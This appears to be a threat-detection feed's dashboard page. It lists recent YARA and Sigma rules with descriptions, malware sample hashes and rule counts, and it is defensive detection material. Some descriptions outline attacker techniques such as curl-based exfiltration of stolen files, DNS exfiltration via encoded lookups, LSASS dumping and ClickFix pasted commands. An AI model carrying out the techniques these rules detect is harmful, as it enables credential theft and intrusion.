currently serving 23331 YARA rules and 4335 Sigma rules
API Key
New Rules per Day
Newest YARA Rules
This table shows the newest additions to the YARA rule set
Rule
Description
Date
Ref
MAL_GlassWorm_Campaign_Stage2_Nov25
Detects GlassWorm campaign second stage that steals credentials
30.11.2025
MAL_GlassWorm_Campaign_Dec_Stage_Nov25
Detects JavaScript code used to decrypted GlassWorm stages
30.11.2025
MAL_GlassWorm_Campaign_Encoded_Dec_Stage_Nov25
Detects Encoded JavaScript code used to decrypted GlassWorm stages
30.11.2025
MAL_GlassWorm_Campaign_Stage1_Nov25
Detects GlassWorm campaign first stage that uses Solana blockchain as its C2 infrastructure
30.11.2025
MAL_GlassWorm_Campaign_Final_Stage_Nov25
Detects GlassWorm campaign final stage that act as a backdoor
30.11.2025
EXPL_VMWare_ESXi_Forensic_Artifacts_CVE_2023_34048_Nov25
Detects forensic artifacts related to VMWare ESXi hypervisor exploitation activity CVE-2023-34048
28.11.2025
PUA_PY_VMWare_Cert_Extractor_Nov25
Detects a Python script that extracts extra certificates from VMWare vCenter MDB database files
28.11.2025
PUA_ELF_Volatility_Analyzer_Nov25
Detects the Volatility Analyzer, which could be used to extract credentials and other confidential information from memory dumps on Linux hosts
28.11.2025
PUA_HKTL_V2Ray_Proxy_Tool_Nov25
Detects binaries and archives related to the V2Ray proxy platform, which is commonly used to bypass network controls and occasionally abused in intrusion operations.
28.11.2025
SUSP_Base64_Redicrect_Nov25
Detects suspicious base64 decode and redirection patterns often used in loaders
28.11.2025
SUSP_WEBSHELL_Dropper_Base64_Nov25
Detects suspicious base64 decode and redirection patterns often used in loaders
28.11.2025
PUA_HKTL_V2Ray_Config_Nov25
Detects configuration files related to the V2Ray proxy platform, which is commonly used to bypass network controls and occasionally abused in intrusion operations.
28.11.2025
MAL_Snake_Disk_Worm_Nov25
Detects Snake Disk Worm malware used by Mustang Panda APT group
27.11.2025
MAL_LNX_SWORD_RAT_Nov25
Detects Linux Sword RAT, which allows attacker to control infected machines remotely using commands (cat, cd, cpls, mkdir, rm, rmdir, socks, job, stopplugin, loadplugin, remove, mv, rsocks, net, stat, ps, pwd, whoami, plugins, pluginrun, pluginrunasync, insmod, append_lines, remove_lines).
26.11.2025
SUSP_KALI_INDICATOR_Nov25
Detects files indicating the presence of a Kali Linux home directory, which may suggest they have been compiled under Kali Linux with malicious intent
26.11.2025
SUSP_NPM_SupplyChain_Attack_PreInstallScript_Nov25
Detects suspicious preinstall script in package.json
25.11.2025
SUSP_NPM_SupplyChain_Attack_PostInstallScript_Nov25_2
Detects suspicious postinstall script in package.json
25.11.2025
MAL_NET_Blackhawk_Loader_Nov25
Detects BLACKHAWK loader. A loader using process hollowing to inject a payload into a legitimate process.
25.11.2025
SUSP_JS_NPM_SetupScript_Nov25
Detects suspicious JavaScript which exits silently and checks operating system
24.11.2025
MAL_NPM_SupplyChain_Attack_PreInstallScript_Nov25
Detects known malicious preinstall script in package.json
24.11.2025
HKTL_ServiceLoader_RepairAgent_Nov25
Detects the service loader and repair module responsible for executing --install and --repair commands, validating Explorer-based DLL loading, and checking operational network ports during deployment.
24.11.2025
HKTL_UploadMonitor_WorkerThread_Nov25
Detects the upload-monitoring component that initializes logging, launches upload worker threads, tracks modified content, and prepares data for exfiltration workflows.
24.11.2025
MAL_LNK_PWSH_EXEC_Nov25
Detects suspicious LNK file that contains encoded PowerShell script execution
24.11.2025
Successful YARA Rules in Set
This table shows statistics of the best rules with lowest AV detection rates (rules created in the last 12 months, matches of the last 14 days)
Rule
Average AV Detection Rate
Sample Count
Info
VT
Latest YARA Matches with Low AV Detection Rate
This table lists the last matches with low AV detection rates (between 0 and 15 AV engines matched)
Rule
AVs
Hash
VT
SUSP_HKTL_Hacktool_Strings_Oct21_1
13
293d5ebf4e3901fab9de2c23e6920af98778447b91e5bab2e3e45ba008050181
SUSP_EXPL_ShellCode_Loader_Nov22_1
13
293d5ebf4e3901fab9de2c23e6920af98778447b91e5bab2e3e45ba008050181
MAL_CRIME_RAT_WIN_PE_GodRat_Aug25
4
1a6e5aadab82ecbd96ca70dd3dc7dab71b720649fc14dba7fdf0c9be3b9c58f1
SUSP_HKTL_Hacktool_Strings_Oct21_1
13
810e887781dfe80730b686e2f499a3ce1e39b084ffe5712328dcf52b2d230a69
SUSP_EXPL_ShellCode_Loader_Nov22_1
12
06d64e4a808306a8ad31b7de61320cb54199f7eea75221810fba7d1e2c507ac2
HKTL_MAL_CobaltStrike_Loader_Feb23_1
12
b9ae362ea9b05990225a44b040627a2578542b4f3f9b4253f1d0ce540ef480da
MAL_LNX_SH_CryptoMiner_Campaign_Dec20_1
11
0623222eb941a432cce79068053cb9d11c8ef491b7093350f4cad1f4e3b01f2d
YARA Rules Per Category
This list shows the number of YARA rules in the subscribable categories (categories overlap as a rule can be in 'n' categories)
Tag
Count
Malware
7274
Threat Hunting (not subscribable, only in THOR scanner)
5695
APT
5037
Hacktools
4776
Webshells
2396
Exploits
701
Newest Sigma Rules
This table shows the newest additions to the Sigma rule set
Rule
Description
Date
Ref
Info
AWS GuardDuty Detector Deleted Or Updated
Detects successful deletion or disabling of an AWS GuardDuty detector, possibly by an attacker trying to avoid detection of its malicious activities.
Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost.
Verify with the user identity that this activity is legitimate.
27.11.2025
Renamed Schtasks Execution
Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.
One of the very common persistence techniques is schedule malicious tasks using schtasks.exe.
Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.
27.11.2025
Grixba Malware Reconnaissance Activity
Detects execution of the Grixba reconnaissance tool based on suspicious command-line parameter combinations.
This tool is used by the Play ransomware group for network enumeration, data gathering, and event log clearing.
26.11.2025
Suspicious FileFix Execution Pattern
Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation.
This attack typically begins when users visit malicious websites impersonating legitimate services or news platforms,
which may display fake CAPTCHA challenges or direct instructions to open file explorer and paste clipboard content.
The clipboard content usually contains commands that download and execute malware, such as information stealing tools.
24.11.2025
HackTool - WSASS Execution
Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's
(Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.
23.11.2025
Windows Default Domain GPO Modification via GPME
Detects the use of the Group Policy Management Editor (GPME) to modify Default Domain or Default Domain Controllers Group Policy Objects (GPOs).
Adversaries may leverage GPME to make stealthy changes in these default GPOs to deploy malicious GPOs configurations across the domain without raising suspicion.
22.11.2025
Unsigned .node File Loaded
Detects the loading of unsigned .node files.
Adversaries may abuse a lack of .node integrity checking to execute arbitrary code inside of trusted applications such as Slack.
.node files are native add-ons for Electron-based applications, which are commonly used for desktop applications like Slack, Discord, and Visual Studio Code.
This technique has been observed in the DripLoader malware, which uses unsigned .node files to load malicious native code into Electron applications.
22.11.2025
Windows Default Domain GPO Modification
Detects modifications to Default Domain or Default Domain Controllers Group Policy Objects (GPOs).
Adversaries may modify these default GPOs to deploy malicious configurations across the domain.
22.11.2025
Suspicious Filename with Embedded Base64 Commands
Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.
These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.
22.11.2025
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
22.11.2025
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
22.11.2025
Suspicious Child Process Spawned by Node.js
Detects suspicious child processes spawned by Node.js that could indicate compromised npm packages or malicious scripts.
Malicious packages often use install/preinstall scripts to execute unauthorized system commands through these child processes.
Investigate immediately as this may indicate package compromise or malicious code execution.
21.11.2025
Suspicious DNS Exfiltration via Command Line
Detects potential data exfiltration using DNS lookups with encoded data, typically used by malicious scripts.
This technique may involve encoding data (e.g., using xxd) and sending it via DNS queries (e.g., using nslookup).
21.11.2025
Cisco ASA Exploitation Activity - Proxy
Detects suspicious requests to Cisco ASA WebVpn via proxy logs associated with CVE-2025-20333 and CVE-2025-20362 exploitation.
20.11.2025
Suspicious ClickFix/FileFix Execution Pattern
Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).
Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.
19.11.2025
DNS Query by Finger Utility
Detects DNS queries made by the finger utility, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
Investigating such DNS queries can also help identify potential malicious infrastructure used by threat actors for command and control (C2) communication.
19.11.2025
Network Connection Initiated via Finger.EXE
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
19.11.2025
Suspicious Kerberos Ticket Request via CLI
Detects suspicious Kerberos ticket requests via command line using System.IdentityModel.Tokens.KerberosRequestorSecurityToken class.
Threat actors may use command line interfaces to request Kerberos tickets for service accounts in order to
perform offline password cracking attacks commonly known as Kerberoasting or other Kerberos ticket abuse
techniques like silver ticket attacks.
18.11.2025
RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class
Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell.
In PowerShell one-liner commands, the "SetAllowTSConnections" method of the "Win32_TerminalServiceSetting" class may be used to enable or disable RDP.
In WMIC, the "rdtoggle" alias or "Win32_TerminalServiceSetting" class may be used for the same purpose.
15.11.2025
Uncommon Svchost Command Line Parameter
Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.
This could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.
14.11.2025
Suspicious Usage of For Loop with Recursive Directory Search in CMD
Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.
This pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.
This behavior has been observed in various malicious lnk files.
12.11.2025
Suspicious Space Characters in RunMRU Registry Path - ClickFix
Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.
04.11.2025
Suspicious Space Characters in TypedPaths Registry Path - FileFix
Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.
04.11.2025
Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix
Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.
ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.
The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.
04.11.2025
FortiGate - New Administrator Account Created
Detects the creation of an administrator account on a Fortinet FortiGate Firewall.
01.11.2025
FortiGate - Firewall Address Object Added
Detects the addition of firewall address objects on a Fortinet FortiGate Firewall.
01.11.2025
FortiGate - New Firewall Policy Added
Detects the addition of a new firewall policy on a Fortinet FortiGate Firewall.
01.11.2025
FortiGate - New Local User Created
Detects the creation of a new local user on a Fortinet FortiGate Firewall.
The new local user could be used for VPN connections.
01.11.2025
FortiGate - User Group Modified
Detects the modification of a user group on a Fortinet FortiGate Firewall.
The group could be used to grant VPN access to a network.
01.11.2025
YARA/SIGMA Rule Count
Rule Type
Community Feed
Nextron Private Feed
Yara
2709
20622
Sigma
3510
825
Sigma Rules Per Category (Community)
Type
Count
windows / process_creation
1319
windows / registry_set
214
windows / file_event
203
windows / ps_script
165
windows / security
160
linux / process_creation
128
windows / image_load
112
webserver
82
windows / system
74
macos / process_creation
68
aws / cloudtrail
55
proxy
54
windows / network_connection
53
linux / auditd
53
azure / activitylogs
42
windows / registry_event
40
azure / auditlogs
38
windows / ps_module
33
windows / application
31
windows / dns_query
26
azure / signinlogs
24
windows / process_access
23
okta / okta
22
azure / riskdetection
19
windows / pipe_created
18
opencanary / application
18
rpc_firewall / application
17
windows / windefend
16
github / audit
16
linux
16
gcp / gcp.audit
16
bitbucket / audit
14
m365 / threat_management
13
windows / file_delete
13
linux / file_event
13
cisco / aaa
12
windows / create_remote_thread
12
windows / driver_load
10
kubernetes / application / audit
10
windows / codeintegrity-operational
10
windows / ps_classic_start
9
dns
9
windows / create_stream_hash
9
windows / registry_delete
9
windows / firewall-as
8
windows / msexchange-management
8
antivirus
7
fortigate / event
7
windows / appxdeployment-server
7
windows / file_access
7
azure / pim
7
windows / bits-client
7
zeek / smb_files
7
gcp / google_workspace.admin
7
windows / dns-client
6
jvm / application
5
kubernetes / audit
5
zeek / dns
5
linux / network_connection
5
zeek / http
5
windows / sysmon
4
windows / taskscheduler
4
windows / iis-configuration
4
zeek / dce_rpc
4
macos / file_event
3
windows / wmi_event
3
windows / powershell-classic
3
windows / ntlm
3
windows / registry_add
3
linux / sshd
3
m365 / audit
3
windows / dns-server
2
apache
2
spring / application
2
onelogin / onelogin.events
2
firewall
2
linux / syslog
2
windows / file_change
2
windows / security-mitigations
2
m365 / exchange
1
zeek / rdp
1
windows / smbclient-security
1
windows / file_rename
1
ruby_on_rails / application
1
m365 / threat_detection
1
zeek / kerberos
1
windows / terminalservices-localsessionmanager
1
windows / sysmon_status
1
velocity / application
1
windows / driver-framework
1
windows
1
windows / sysmon_error
1
sql / application
1
cisco / duo
1
cisco / bgp
1
nginx
1
linux / sudo
1
cisco / ldp
1
windows / ldap
1
windows / wmi
1
windows / dns-server-analytic
1
windows / lsa-server
1
windows / ps_classic_provider_start
1
windows / printservice-admin
1
database
1
linux / clamav
1
windows / applocker
1
windows / printservice-operational
1
linux / guacamole
1
django / application
1
linux / auth
1
linux / cron
1
huawei / bgp
1
windows / appmodel-runtime
1
windows / openssh
1
fortios / sslvpnd
1
juniper / bgp
1
windows / appxpackaging-om
1
windows / process_tampering
1
cisco / syslog
1
windows / smbclient-connectivity
1
windows / smbserver-connectivity
1
paloalto / file_event / globalprotect
1
linux / vsftpd
1
windows / capi2
1
windows / shell-core
1
windows / raw_access_thread
1
paloalto / appliance / globalprotect
1
zeek / x509
1
windows / certificateservicesclient-lifecycle-system
1
windows / microsoft-servicebus-client
1
nodejs / application
1
python / application
1
windows / diagnosis-scripted
1
windows / file_executable_detected
1
Sigma Rules Per Category (Nextron Private Feed)
Type
Count
windows / process_creation
390
windows / registry_set
78
windows / ps_script
76
windows / image_load
43
windows / file_event
38
linux / process_creation
36
windows / wmi
29
windows / security
22
proxy
12
windows / system
9
windows / network_connection
8
windows / registry_event
8
windows / kernel-event-tracing
6
windows / ntfs
5
windows / ps_module
5
windows / create_remote_thread
4
windows / pipe_created
4
windows / sense
4
windows / taskscheduler
4
windows / registry_delete
4
windows / hyper-v-worker
3
windows / ps_classic_script
3
windows / vhd
3
webserver
3
windows / driver_load
3
windows / application-experience
3
windows / codeintegrity-operational
2
windows / kernel-shimengine
2
windows / windefend
2
windows / process_access
2
windows / bits-client
2
windows / firewall-as
1
windows / file_delete
1
windows / registry-setinformation
1
linux / file_event
1
windows / file_rename
1
windows / dns_query
1
macos / process_creation
1
windows / amsi
1
windows / process-creation
1
windows / application
1
windows / file_access
1
windows / audit-cve
1
Tenable Nessus
Requirement: Privileged Scan
- YARA Scanning with Nessus works only when scanning with credentials (privileged scan)
YARA Scanning with Nessus
- You can only upload a single .yar file
- Filesystem scan has to be activated
- You have to define the target locations
- The Nessus plugin ID will be 91990
- Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls, .xls
Carbon Black
Tutorial: https://github.com/carbonblack/cb-yara-connectorFireEye EX
Tutorial: https://www.fireeye.com/blog/products-and-services/2018/12/detect-and-block-email-threats-with-custom-yara-rules.html
Scan your endpoints, forensic images or collected files with our portable scanner THOR